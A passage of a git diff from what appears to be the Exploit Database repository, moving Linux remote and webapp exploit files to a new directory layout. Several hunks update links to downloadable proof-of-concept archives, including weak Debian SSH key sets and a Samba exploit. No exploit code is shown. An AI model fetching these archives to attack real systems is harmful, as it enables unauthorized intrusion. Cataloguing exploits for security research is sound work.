a/platforms/linux/remote/39196.py b/exploits/linux/remote/39196.py similarity index 100% rename from platforms/linux/remote/39196.py rename to exploits/linux/remote/39196.py diff --git a/platforms/linux/remote/392.c b/exploits/linux/remote/392.c similarity index 100% rename from platforms/linux/remote/392.c rename to exploits/linux/remote/392.c diff --git a/platforms/linux/remote/3922.c b/exploits/linux/remote/3922.c similarity index 100% rename from platforms/linux/remote/3922.c rename to exploits/linux/remote/3922.c diff --git a/platforms/linux/remote/39499.txt b/exploits/linux/remote/39499.txt similarity index 100% rename from platforms/linux/remote/39499.txt rename to exploits/linux/remote/39499.txt diff --git a/platforms/linux/remote/39632.py b/exploits/linux/remote/39632.py similarity index 100% rename from platforms/linux/remote/39632.py rename to exploits/linux/remote/39632.py diff --git a/platforms/linux/remote/397.c b/exploits/linux/remote/397.c similarity index 100% rename from platforms/linux/remote/397.c rename to exploits/linux/remote/397.c diff --git a/platforms/linux/remote/39736.txt b/exploits/linux/remote/39736.txt similarity index 95% rename from platforms/linux/remote/39736.txt rename to exploits/linux/remote/39736.txt index b46dfaace..8722f002f 100644 --- a/platforms/linux/remote/39736.txt +++ b/exploits/linux/remote/39736.txt @@ -230,7 +230,7 @@ Solution This bug has been fixed in git HEAD [4]. Full Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39736.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39736.zip Footnotes _________ diff --git a/platforms/linux/remote/39756.rb b/exploits/linux/remote/39756.rb similarity index 100% rename from platforms/linux/remote/39756.rb rename to exploits/linux/remote/39756.rb diff --git a/platforms/linux/remote/398.c b/exploits/linux/remote/398.c similarity index 100% rename from platforms/linux/remote/398.c rename to exploits/linux/remote/398.c diff --git a/platforms/linux/remote/399.c b/exploits/linux/remote/399.c similarity index 100% rename from platforms/linux/remote/399.c rename to exploits/linux/remote/399.c diff --git a/platforms/linux/remote/39945.rb b/exploits/linux/remote/39945.rb similarity index 100% rename from platforms/linux/remote/39945.rb rename to exploits/linux/remote/39945.rb diff --git a/platforms/linux/remote/39958.rb b/exploits/linux/remote/39958.rb similarity index 100% rename from platforms/linux/remote/39958.rb rename to exploits/linux/remote/39958.rb diff --git a/platforms/linux/remote/39973.rb b/exploits/linux/remote/39973.rb similarity index 100% rename from platforms/linux/remote/39973.rb rename to exploits/linux/remote/39973.rb diff --git a/platforms/linux/remote/400.c b/exploits/linux/remote/400.c similarity index 100% rename from platforms/linux/remote/400.c rename to exploits/linux/remote/400.c diff --git a/platforms/linux/remote/40064.txt b/exploits/linux/remote/40064.txt similarity index 100% rename from platforms/linux/remote/40064.txt rename to exploits/linux/remote/40064.txt diff --git a/platforms/linux/remote/40067.rb b/exploits/linux/remote/40067.rb similarity index 100% rename from platforms/linux/remote/40067.rb rename to exploits/linux/remote/40067.rb diff --git a/platforms/linux/remote/40108.rb b/exploits/linux/remote/40108.rb similarity index 100% rename from platforms/linux/remote/40108.rb rename to exploits/linux/remote/40108.rb diff --git a/platforms/linux/remote/40113.txt b/exploits/linux/remote/40113.txt similarity index 100% rename from platforms/linux/remote/40113.txt rename to exploits/linux/remote/40113.txt diff --git a/platforms/linux/remote/40119.md b/exploits/linux/remote/40119.md similarity index 100% rename from platforms/linux/remote/40119.md rename to exploits/linux/remote/40119.md diff --git a/platforms/linux/remote/40136.py b/exploits/linux/remote/40136.py similarity index 100% rename from platforms/linux/remote/40136.py rename to exploits/linux/remote/40136.py diff --git a/platforms/linux/remote/40146.rb b/exploits/linux/remote/40146.rb similarity index 100% rename from platforms/linux/remote/40146.rb rename to exploits/linux/remote/40146.rb diff --git a/platforms/linux/remote/40147.rb b/exploits/linux/remote/40147.rb similarity index 100% rename from platforms/linux/remote/40147.rb rename to exploits/linux/remote/40147.rb diff --git a/platforms/linux/remote/40162.rb b/exploits/linux/remote/40162.rb similarity index 100% rename from platforms/linux/remote/40162.rb rename to exploits/linux/remote/40162.rb diff --git a/platforms/linux/remote/40167.txt b/exploits/linux/remote/40167.txt similarity index 100% rename from platforms/linux/remote/40167.txt rename to exploits/linux/remote/40167.txt diff --git a/platforms/linux/remote/40176.rb b/exploits/linux/remote/40176.rb similarity index 100% rename from platforms/linux/remote/40176.rb rename to exploits/linux/remote/40176.rb diff --git a/platforms/linux/remote/40177.rb b/exploits/linux/remote/40177.rb similarity index 100% rename from platforms/linux/remote/40177.rb rename to exploits/linux/remote/40177.rb diff --git a/platforms/linux/remote/40201.txt b/exploits/linux/remote/40201.txt similarity index 100% rename from platforms/linux/remote/40201.txt rename to exploits/linux/remote/40201.txt diff --git a/platforms/linux/remote/40232.py b/exploits/linux/remote/40232.py similarity index 100% rename from platforms/linux/remote/40232.py rename to exploits/linux/remote/40232.py diff --git a/platforms/linux/remote/40339.py b/exploits/linux/remote/40339.py similarity index 100% rename from platforms/linux/remote/40339.py rename to exploits/linux/remote/40339.py diff --git a/platforms/linux/remote/40358.py b/exploits/linux/remote/40358.py similarity index 100% rename from platforms/linux/remote/40358.py rename to exploits/linux/remote/40358.py diff --git a/platforms/linux/remote/404.pl b/exploits/linux/remote/404.pl similarity index 100% rename from platforms/linux/remote/404.pl rename to exploits/linux/remote/404.pl diff --git a/platforms/linux/remote/40507.py b/exploits/linux/remote/40507.py similarity index 100% rename from platforms/linux/remote/40507.py rename to exploits/linux/remote/40507.py diff --git a/platforms/linux/remote/40609.rb b/exploits/linux/remote/40609.rb similarity index 100% rename from platforms/linux/remote/40609.rb rename to exploits/linux/remote/40609.rb diff --git a/platforms/linux/remote/40610.rb b/exploits/linux/remote/40610.rb similarity index 100% rename from platforms/linux/remote/40610.rb rename to exploits/linux/remote/40610.rb diff --git a/platforms/linux/remote/40689.rb b/exploits/linux/remote/40689.rb similarity index 100% rename from platforms/linux/remote/40689.rb rename to exploits/linux/remote/40689.rb diff --git a/platforms/linux/remote/408.c b/exploits/linux/remote/408.c similarity index 100% rename from platforms/linux/remote/408.c rename to exploits/linux/remote/408.c diff --git a/platforms/linux/remote/4087.c b/exploits/linux/remote/4087.c similarity index 100% rename from platforms/linux/remote/4087.c rename to exploits/linux/remote/4087.c diff --git a/platforms/linux/remote/40911.py b/exploits/linux/remote/40911.py similarity index 100% rename from platforms/linux/remote/40911.py rename to exploits/linux/remote/40911.py diff --git a/platforms/linux/remote/40916.txt b/exploits/linux/remote/40916.txt similarity index 97% rename from platforms/linux/remote/40916.txt rename to exploits/linux/remote/40916.txt index 70dc165d6..9fbcb6c09 100644 --- a/platforms/linux/remote/40916.txt +++ b/exploits/linux/remote/40916.txt @@ -181,4 +181,4 @@ package file, without some of the usual information.) Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40916.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40916.zip \ No newline at end of file diff --git a/platforms/linux/remote/40920.py b/exploits/linux/remote/40920.py similarity index 100% rename from platforms/linux/remote/40920.py rename to exploits/linux/remote/40920.py diff --git a/platforms/linux/remote/40963.txt b/exploits/linux/remote/40963.txt similarity index 100% rename from platforms/linux/remote/40963.txt rename to exploits/linux/remote/40963.txt diff --git a/platforms/linux/remote/41.pl b/exploits/linux/remote/41.pl similarity index 100% rename from platforms/linux/remote/41.pl rename to exploits/linux/remote/41.pl diff --git a/platforms/linux/remote/41013.txt b/exploits/linux/remote/41013.txt similarity index 100% rename from platforms/linux/remote/41013.txt rename to exploits/linux/remote/41013.txt diff --git a/platforms/linux/remote/41041.rb b/exploits/linux/remote/41041.rb similarity index 100% rename from platforms/linux/remote/41041.rb rename to exploits/linux/remote/41041.rb diff --git a/platforms/linux/remote/41162.py b/exploits/linux/remote/41162.py similarity index 100% rename from platforms/linux/remote/41162.py rename to exploits/linux/remote/41162.py diff --git a/platforms/linux/remote/41233.py b/exploits/linux/remote/41233.py similarity index 100% rename from platforms/linux/remote/41233.py rename to exploits/linux/remote/41233.py diff --git a/platforms/linux/remote/413.c b/exploits/linux/remote/413.c similarity index 100% rename from platforms/linux/remote/413.c rename to exploits/linux/remote/413.c diff --git a/platforms/linux/remote/416.c b/exploits/linux/remote/416.c similarity index 100% rename from platforms/linux/remote/416.c rename to exploits/linux/remote/416.c diff --git a/platforms/linux/remote/4162.c b/exploits/linux/remote/4162.c similarity index 100% rename from platforms/linux/remote/4162.c rename to exploits/linux/remote/4162.c diff --git a/platforms/linux/remote/41679.rb b/exploits/linux/remote/41679.rb similarity index 100% rename from platforms/linux/remote/41679.rb rename to exploits/linux/remote/41679.rb diff --git a/platforms/linux/remote/41680.rb b/exploits/linux/remote/41680.rb similarity index 100% rename from platforms/linux/remote/41680.rb rename to exploits/linux/remote/41680.rb diff --git a/platforms/linux/remote/41695.rb b/exploits/linux/remote/41695.rb similarity index 100% rename from platforms/linux/remote/41695.rb rename to exploits/linux/remote/41695.rb diff --git a/platforms/linux/remote/41744.rb b/exploits/linux/remote/41744.rb similarity index 100% rename from platforms/linux/remote/41744.rb rename to exploits/linux/remote/41744.rb diff --git a/platforms/linux/remote/41785.rb b/exploits/linux/remote/41785.rb similarity index 100% rename from platforms/linux/remote/41785.rb rename to exploits/linux/remote/41785.rb diff --git a/platforms/linux/remote/41795.rb b/exploits/linux/remote/41795.rb similarity index 100% rename from platforms/linux/remote/41795.rb rename to exploits/linux/remote/41795.rb diff --git a/platforms/linux/remote/41861.py b/exploits/linux/remote/41861.py similarity index 100% rename from platforms/linux/remote/41861.py rename to exploits/linux/remote/41861.py diff --git a/platforms/linux/remote/41892.sh b/exploits/linux/remote/41892.sh similarity index 100% rename from platforms/linux/remote/41892.sh rename to exploits/linux/remote/41892.sh diff --git a/platforms/linux/remote/41910.sh b/exploits/linux/remote/41910.sh similarity index 100% rename from platforms/linux/remote/41910.sh rename to exploits/linux/remote/41910.sh diff --git a/platforms/linux/remote/42010.rb b/exploits/linux/remote/42010.rb similarity index 100% rename from platforms/linux/remote/42010.rb rename to exploits/linux/remote/42010.rb diff --git a/platforms/linux/remote/42060.py b/exploits/linux/remote/42060.py similarity index 100% rename from platforms/linux/remote/42060.py rename to exploits/linux/remote/42060.py diff --git a/platforms/linux/remote/42078.js b/exploits/linux/remote/42078.js similarity index 100% rename from platforms/linux/remote/42078.js rename to exploits/linux/remote/42078.js diff --git a/platforms/linux/remote/42084.rb b/exploits/linux/remote/42084.rb similarity index 100% rename from platforms/linux/remote/42084.rb rename to exploits/linux/remote/42084.rb diff --git a/platforms/linux/remote/42158.py b/exploits/linux/remote/42158.py similarity index 100% rename from platforms/linux/remote/42158.py rename to exploits/linux/remote/42158.py diff --git a/platforms/linux/remote/424.c b/exploits/linux/remote/424.c similarity index 100% rename from platforms/linux/remote/424.c rename to exploits/linux/remote/424.c diff --git a/platforms/linux/remote/4243.c b/exploits/linux/remote/4243.c similarity index 100% rename from platforms/linux/remote/4243.c rename to exploits/linux/remote/4243.c diff --git a/platforms/linux/remote/42627.py b/exploits/linux/remote/42627.py similarity index 100% rename from platforms/linux/remote/42627.py rename to exploits/linux/remote/42627.py diff --git a/platforms/linux/remote/42695.rb b/exploits/linux/remote/42695.rb similarity index 100% rename from platforms/linux/remote/42695.rb rename to exploits/linux/remote/42695.rb diff --git a/platforms/linux/remote/42697.rb b/exploits/linux/remote/42697.rb similarity index 100% rename from platforms/linux/remote/42697.rb rename to exploits/linux/remote/42697.rb diff --git a/platforms/linux/remote/42708.rb b/exploits/linux/remote/42708.rb similarity index 100% rename from platforms/linux/remote/42708.rb rename to exploits/linux/remote/42708.rb diff --git a/platforms/linux/remote/42709.rb b/exploits/linux/remote/42709.rb similarity index 100% rename from platforms/linux/remote/42709.rb rename to exploits/linux/remote/42709.rb diff --git a/platforms/linux/remote/42779.rb b/exploits/linux/remote/42779.rb similarity index 100% rename from platforms/linux/remote/42779.rb rename to exploits/linux/remote/42779.rb diff --git a/platforms/linux/remote/42790.txt b/exploits/linux/remote/42790.txt similarity index 100% rename from platforms/linux/remote/42790.txt rename to exploits/linux/remote/42790.txt diff --git a/platforms/linux/remote/42938.rb b/exploits/linux/remote/42938.rb similarity index 100% rename from platforms/linux/remote/42938.rb rename to exploits/linux/remote/42938.rb diff --git a/platforms/linux/remote/42949.txt b/exploits/linux/remote/42949.txt similarity index 100% rename from platforms/linux/remote/42949.txt rename to exploits/linux/remote/42949.txt diff --git a/platforms/linux/remote/42957.py b/exploits/linux/remote/42957.py similarity index 100% rename from platforms/linux/remote/42957.py rename to exploits/linux/remote/42957.py diff --git a/platforms/linux/remote/42958.py b/exploits/linux/remote/42958.py similarity index 100% rename from platforms/linux/remote/42958.py rename to exploits/linux/remote/42958.py diff --git a/platforms/linux/remote/43.pl b/exploits/linux/remote/43.pl similarity index 100% rename from platforms/linux/remote/43.pl rename to exploits/linux/remote/43.pl diff --git a/platforms/linux/remote/4312.c b/exploits/linux/remote/4312.c similarity index 100% rename from platforms/linux/remote/4312.c rename to exploits/linux/remote/4312.c diff --git a/platforms/linux/remote/4315.py b/exploits/linux/remote/4315.py similarity index 100% rename from platforms/linux/remote/4315.py rename to exploits/linux/remote/4315.py diff --git a/platforms/linux/remote/4321.rb b/exploits/linux/remote/4321.rb similarity index 100% rename from platforms/linux/remote/4321.rb rename to exploits/linux/remote/4321.rb diff --git a/platforms/linux/remote/4362.pl b/exploits/linux/remote/4362.pl similarity index 100% rename from platforms/linux/remote/4362.pl rename to exploits/linux/remote/4362.pl diff --git a/platforms/linux/remote/437.c b/exploits/linux/remote/437.c similarity index 100% rename from platforms/linux/remote/437.c rename to exploits/linux/remote/437.c diff --git a/platforms/linux/remote/4437.c b/exploits/linux/remote/4437.c similarity index 100% rename from platforms/linux/remote/4437.c rename to exploits/linux/remote/4437.c diff --git a/platforms/linux/remote/4478.c b/exploits/linux/remote/4478.c similarity index 100% rename from platforms/linux/remote/4478.c rename to exploits/linux/remote/4478.c diff --git a/platforms/linux/remote/4514.c b/exploits/linux/remote/4514.c similarity index 100% rename from platforms/linux/remote/4514.c rename to exploits/linux/remote/4514.c diff --git a/platforms/linux/remote/4533.c b/exploits/linux/remote/4533.c similarity index 100% rename from platforms/linux/remote/4533.c rename to exploits/linux/remote/4533.c diff --git a/platforms/linux/remote/4534.c b/exploits/linux/remote/4534.c similarity index 100% rename from platforms/linux/remote/4534.c rename to exploits/linux/remote/4534.c diff --git a/platforms/linux/remote/4537.c b/exploits/linux/remote/4537.c similarity index 100% rename from platforms/linux/remote/4537.c rename to exploits/linux/remote/4537.c diff --git a/platforms/linux/remote/4541.c b/exploits/linux/remote/4541.c similarity index 100% rename from platforms/linux/remote/4541.c rename to exploits/linux/remote/4541.c diff --git a/platforms/linux/remote/4542.py b/exploits/linux/remote/4542.py similarity index 100% rename from platforms/linux/remote/4542.py rename to exploits/linux/remote/4542.py diff --git a/platforms/linux/remote/4552.pl b/exploits/linux/remote/4552.pl similarity index 100% rename from platforms/linux/remote/4552.pl rename to exploits/linux/remote/4552.pl diff --git a/platforms/linux/remote/46.c b/exploits/linux/remote/46.c similarity index 100% rename from platforms/linux/remote/46.c rename to exploits/linux/remote/46.c diff --git a/platforms/linux/remote/4862.py b/exploits/linux/remote/4862.py similarity index 100% rename from platforms/linux/remote/4862.py rename to exploits/linux/remote/4862.py diff --git a/platforms/linux/remote/49.c b/exploits/linux/remote/49.c similarity index 100% rename from platforms/linux/remote/49.c rename to exploits/linux/remote/49.c diff --git a/platforms/linux/remote/4947.c b/exploits/linux/remote/4947.c similarity index 100% rename from platforms/linux/remote/4947.c rename to exploits/linux/remote/4947.c diff --git a/platforms/linux/remote/5224.php b/exploits/linux/remote/5224.php similarity index 100% rename from platforms/linux/remote/5224.php rename to exploits/linux/remote/5224.php diff --git a/platforms/linux/remote/5283.txt b/exploits/linux/remote/5283.txt similarity index 100% rename from platforms/linux/remote/5283.txt rename to exploits/linux/remote/5283.txt diff --git a/platforms/linux/remote/5386.txt b/exploits/linux/remote/5386.txt similarity index 92% rename from platforms/linux/remote/5386.txt rename to exploits/linux/remote/5386.txt index 88ff7b19c..02f6c545f 100644 --- a/platforms/linux/remote/5386.txt +++ b/exploits/linux/remote/5386.txt @@ -52,6 +52,6 @@ ** */ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5386.tar.gz (2008-x2_fc6f7f8.tar.gz) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5386.tar.gz (2008-x2_fc6f7f8.tar.gz) # milw0rm.com [2008-04-06] \ No newline at end of file diff --git a/platforms/linux/remote/55.c b/exploits/linux/remote/55.c similarity index 100% rename from platforms/linux/remote/55.c rename to exploits/linux/remote/55.c diff --git a/platforms/linux/remote/5622.txt b/exploits/linux/remote/5622.txt similarity index 92% rename from platforms/linux/remote/5622.txt rename to exploits/linux/remote/5622.txt index d038fb91d..62b94581f 100644 --- a/platforms/linux/remote/5622.txt +++ b/exploits/linux/remote/5622.txt @@ -13,7 +13,7 @@ keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl ***E-DB Note: Mirror ~ https://github.com/g0tmi1k/debian-ssh*** 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) 2. Extract it to a directory diff --git a/platforms/linux/remote/5632.rb b/exploits/linux/remote/5632.rb similarity index 89% rename from platforms/linux/remote/5632.rb rename to exploits/linux/remote/5632.rb index 433d21362..1949fe257 100755 --- a/platforms/linux/remote/5632.rb +++ b/exploits/linux/remote/5632.rb @@ -13,8 +13,8 @@ # # Common Keys: # -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2) -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) +# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2) +# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) # # # Usage: diff --git a/platforms/linux/remote/5720.py b/exploits/linux/remote/5720.py similarity index 94% rename from platforms/linux/remote/5720.py rename to exploits/linux/remote/5720.py index dcdf11e0e..752d89d3f 100755 --- a/platforms/linux/remote/5720.py +++ b/exploits/linux/remote/5720.py @@ -17,7 +17,7 @@ # Autor: hitz - WarCat team (warcat.no-ip.org) # Collaborator: pretoriano # -# 1. Download https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) +# 1. Download https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) # # 2. Extract it to a directory # diff --git a/platforms/linux/remote/58.c b/exploits/linux/remote/58.c similarity index 100% rename from platforms/linux/remote/58.c rename to exploits/linux/remote/58.c diff --git a/platforms/linux/remote/580.c b/exploits/linux/remote/580.c similarity index 100% rename from platforms/linux/remote/580.c rename to exploits/linux/remote/580.c diff --git a/platforms/linux/remote/581.c b/exploits/linux/remote/581.c similarity index 100% rename from platforms/linux/remote/581.c rename to exploits/linux/remote/581.c diff --git a/platforms/linux/remote/6045.py b/exploits/linux/remote/6045.py similarity index 100% rename from platforms/linux/remote/6045.py rename to exploits/linux/remote/6045.py diff --git a/platforms/linux/remote/608.c b/exploits/linux/remote/608.c similarity index 100% rename from platforms/linux/remote/608.c rename to exploits/linux/remote/608.c diff --git a/platforms/linux/remote/609.txt b/exploits/linux/remote/609.txt similarity index 62% rename from platforms/linux/remote/609.txt rename to exploits/linux/remote/609.txt index 1538c8436..e3ec9a5ba 100644 --- a/platforms/linux/remote/609.txt +++ b/exploits/linux/remote/609.txt @@ -1,4 +1,4 @@ Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/609.tar.gz (ximage_zgv.tar.gz) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/609.tar.gz (ximage_zgv.tar.gz) # milw0rm.com [2004-10-28] \ No newline at end of file diff --git a/platforms/linux/remote/6094.txt b/exploits/linux/remote/6094.txt similarity index 100% rename from platforms/linux/remote/6094.txt rename to exploits/linux/remote/6094.txt diff --git a/platforms/linux/remote/620.c b/exploits/linux/remote/620.c similarity index 100% rename from platforms/linux/remote/620.c rename to exploits/linux/remote/620.c diff --git a/platforms/linux/remote/63.c b/exploits/linux/remote/63.c similarity index 100% rename from platforms/linux/remote/63.c rename to exploits/linux/remote/63.c diff --git a/platforms/linux/remote/652.c b/exploits/linux/remote/652.c similarity index 100% rename from platforms/linux/remote/652.c rename to exploits/linux/remote/652.c diff --git a/platforms/linux/remote/660.c b/exploits/linux/remote/660.c similarity index 100% rename from platforms/linux/remote/660.c rename to exploits/linux/remote/660.c diff --git a/platforms/linux/remote/681.c b/exploits/linux/remote/681.c similarity index 100% rename from platforms/linux/remote/681.c rename to exploits/linux/remote/681.c diff --git a/platforms/linux/remote/7.pl b/exploits/linux/remote/7.pl similarity index 100% rename from platforms/linux/remote/7.pl rename to exploits/linux/remote/7.pl diff --git a/platforms/linux/remote/712.c b/exploits/linux/remote/712.c similarity index 100% rename from platforms/linux/remote/712.c rename to exploits/linux/remote/712.c diff --git a/platforms/linux/remote/7151.c b/exploits/linux/remote/7151.c similarity index 100% rename from platforms/linux/remote/7151.c rename to exploits/linux/remote/7151.c diff --git a/platforms/linux/remote/7183.txt b/exploits/linux/remote/7183.txt similarity index 100% rename from platforms/linux/remote/7183.txt rename to exploits/linux/remote/7183.txt diff --git a/platforms/linux/remote/74.c b/exploits/linux/remote/74.c similarity index 100% rename from platforms/linux/remote/74.c rename to exploits/linux/remote/74.c diff --git a/platforms/linux/remote/7701.txt b/exploits/linux/remote/7701.txt similarity index 95% rename from platforms/linux/remote/7701.txt rename to exploits/linux/remote/7701.txt index 2a2974982..802b771f8 100644 --- a/platforms/linux/remote/7701.txt +++ b/exploits/linux/remote/7701.txt @@ -36,6 +36,6 @@ struct versions vers[VERSN] = {"Samba 3.0.x DEBUG",0x80380000,0x8045b000,30*1024} }; -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7701.zip (2009-lsa.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/7701.zip (2009-lsa.zip) # milw0rm.com [2009-01-08] \ No newline at end of file diff --git a/platforms/linux/remote/775.c b/exploits/linux/remote/775.c similarity index 100% rename from platforms/linux/remote/775.c rename to exploits/linux/remote/775.c diff --git a/platforms/linux/remote/78.c b/exploits/linux/remote/78.c similarity index 100% rename from platforms/linux/remote/78.c rename to exploits/linux/remote/78.c diff --git a/platforms/linux/remote/784.c b/exploits/linux/remote/784.c similarity index 100% rename from platforms/linux/remote/784.c rename to exploits/linux/remote/784.c diff --git a/platforms/linux/remote/785.c b/exploits/linux/remote/785.c similarity index 100% rename from platforms/linux/remote/785.c rename to exploits/linux/remote/785.c diff --git a/platforms/linux/remote/8.c b/exploits/linux/remote/8.c similarity index 100% rename from platforms/linux/remote/8.c rename to exploits/linux/remote/8.c diff --git a/platforms/linux/remote/806.c b/exploits/linux/remote/806.c similarity index 100% rename from platforms/linux/remote/806.c rename to exploits/linux/remote/806.c diff --git a/platforms/linux/remote/812.c b/exploits/linux/remote/812.c similarity index 100% rename from platforms/linux/remote/812.c rename to exploits/linux/remote/812.c diff --git a/platforms/linux/remote/826.c b/exploits/linux/remote/826.c similarity index 100% rename from platforms/linux/remote/826.c rename to exploits/linux/remote/826.c diff --git a/platforms/linux/remote/831.c b/exploits/linux/remote/831.c similarity index 100% rename from platforms/linux/remote/831.c rename to exploits/linux/remote/831.c diff --git a/platforms/linux/remote/8384.txt b/exploits/linux/remote/8384.txt similarity index 100% rename from platforms/linux/remote/8384.txt rename to exploits/linux/remote/8384.txt diff --git a/platforms/linux/remote/84.c b/exploits/linux/remote/84.c similarity index 100% rename from platforms/linux/remote/84.c rename to exploits/linux/remote/84.c diff --git a/platforms/linux/remote/8556.c b/exploits/linux/remote/8556.c similarity index 100% rename from platforms/linux/remote/8556.c rename to exploits/linux/remote/8556.c diff --git a/platforms/linux/remote/8569.txt b/exploits/linux/remote/8569.txt similarity index 100% rename from platforms/linux/remote/8569.txt rename to exploits/linux/remote/8569.txt diff --git a/platforms/linux/remote/8570.txt b/exploits/linux/remote/8570.txt similarity index 100% rename from platforms/linux/remote/8570.txt rename to exploits/linux/remote/8570.txt diff --git a/platforms/linux/remote/878.c b/exploits/linux/remote/878.c similarity index 100% rename from platforms/linux/remote/878.c rename to exploits/linux/remote/878.c diff --git a/platforms/linux/remote/88.c b/exploits/linux/remote/88.c similarity index 100% rename from platforms/linux/remote/88.c rename to exploits/linux/remote/88.c diff --git a/platforms/linux/remote/8880.txt b/exploits/linux/remote/8880.txt similarity index 100% rename from platforms/linux/remote/8880.txt rename to exploits/linux/remote/8880.txt diff --git a/platforms/linux/remote/89.c b/exploits/linux/remote/89.c similarity index 100% rename from platforms/linux/remote/89.c rename to exploits/linux/remote/89.c diff --git a/platforms/linux/remote/900.c b/exploits/linux/remote/900.c similarity index 100% rename from platforms/linux/remote/900.c rename to exploits/linux/remote/900.c diff --git a/platforms/linux/remote/902.c b/exploits/linux/remote/902.c similarity index 100% rename from platforms/linux/remote/902.c rename to exploits/linux/remote/902.c diff --git a/platforms/linux/remote/903.c b/exploits/linux/remote/903.c similarity index 100% rename from platforms/linux/remote/903.c rename to exploits/linux/remote/903.c diff --git a/platforms/linux/remote/9143.txt b/exploits/linux/remote/9143.txt similarity index 100% rename from platforms/linux/remote/9143.txt rename to exploits/linux/remote/9143.txt diff --git a/platforms/linux/remote/915.c b/exploits/linux/remote/915.c similarity index 100% rename from platforms/linux/remote/915.c rename to exploits/linux/remote/915.c diff --git a/platforms/linux/remote/934.c b/exploits/linux/remote/934.c similarity index 100% rename from platforms/linux/remote/934.c rename to exploits/linux/remote/934.c diff --git a/platforms/linux/remote/940.c b/exploits/linux/remote/940.c similarity index 100% rename from platforms/linux/remote/940.c rename to exploits/linux/remote/940.c diff --git a/platforms/linux/remote/970.c b/exploits/linux/remote/970.c similarity index 100% rename from platforms/linux/remote/970.c rename to exploits/linux/remote/970.c diff --git a/platforms/linux/remote/98.c b/exploits/linux/remote/98.c similarity index 100% rename from platforms/linux/remote/98.c rename to exploits/linux/remote/98.c diff --git a/platforms/linux/remote/981.c b/exploits/linux/remote/981.c similarity index 100% rename from platforms/linux/remote/981.c rename to exploits/linux/remote/981.c diff --git a/platforms/linux/remote/99.c b/exploits/linux/remote/99.c similarity index 100% rename from platforms/linux/remote/99.c rename to exploits/linux/remote/99.c diff --git a/platforms/linux/remote/9936.rb b/exploits/linux/remote/9936.rb similarity index 100% rename from platforms/linux/remote/9936.rb rename to exploits/linux/remote/9936.rb diff --git a/platforms/linux/remote/9940.rb b/exploits/linux/remote/9940.rb similarity index 100% rename from platforms/linux/remote/9940.rb rename to exploits/linux/remote/9940.rb diff --git a/platforms/linux/remote/9950.rb b/exploits/linux/remote/9950.rb similarity index 100% rename from platforms/linux/remote/9950.rb rename to exploits/linux/remote/9950.rb diff --git a/platforms/linux/remote/9952.rb b/exploits/linux/remote/9952.rb similarity index 100% rename from platforms/linux/remote/9952.rb rename to exploits/linux/remote/9952.rb diff --git a/platforms/linux/remote/9953.rb b/exploits/linux/remote/9953.rb similarity index 100% rename from platforms/linux/remote/9953.rb rename to exploits/linux/remote/9953.rb diff --git a/platforms/linux/remote/9954.rb b/exploits/linux/remote/9954.rb similarity index 100% rename from platforms/linux/remote/9954.rb rename to exploits/linux/remote/9954.rb diff --git a/platforms/linux/webapps/10261.txt b/exploits/linux/webapps/10261.txt similarity index 100% rename from platforms/linux/webapps/10261.txt rename to exploits/linux/webapps/10261.txt diff --git a/platforms/linux/webapps/10262.txt b/exploits/linux/webapps/10262.txt similarity index 100% rename from platforms/linux/webapps/10262.txt rename to exploits/linux/webapps/10262.txt diff --git a/platforms/linux/webapps/10263.txt b/exploits/linux/webapps/10263.txt similarity index 100% rename from platforms/linux/webapps/10263.txt rename to exploits/linux/webapps/10263.txt diff --git a/platforms/linux/webapps/10426.txt b/exploits/linux/webapps/10426.txt similarity index 100% rename from platforms/linux/webapps/10426.txt rename to exploits/linux/webapps/10426.txt diff --git a/platforms/linux/webapps/10427.txt b/exploits/linux/webapps/10427.txt similarity index 100% rename from platforms/linux/webapps/10427.txt rename to exploits/linux/webapps/10427.txt diff --git a/platforms/linux/webapps/10429.txt b/exploits/linux/webapps/10429.txt similarity index 100% rename from platforms/linux/webapps/10429.txt rename to exploits/linux/webapps/10429.txt diff --git a/platforms/linux/webapps/10430.txt b/exploits/linux/webapps/10430.txt similarity index 100% rename from platforms/linux/webapps/10430.txt rename to exploits/linux/webapps/10430.txt diff --git a/platforms/linux/webapps/10433.txt b/exploits/linux/webapps/10433.txt similarity index 100% rename from platforms/linux/webapps/10433.txt rename to exploits/linux/webapps/10433.txt diff --git a/platforms/linux/webapps/10755.txt b/exploits/linux/webapps/10755.txt similarity index 100% rename from platforms/linux/webapps/10755.txt rename to exploits/linux/webapps/10755.txt diff --git a/platforms/linux/webapps/10756.txt b/exploits/linux/webapps/10756.txt similarity index 100% rename from platforms/linux/webapps/10756.txt rename to exploits/linux/webapps/10756.txt diff --git a/platforms/linux/webapps/10757.txt b/exploits/linux/webapps/10757.txt similarity index 100% rename from 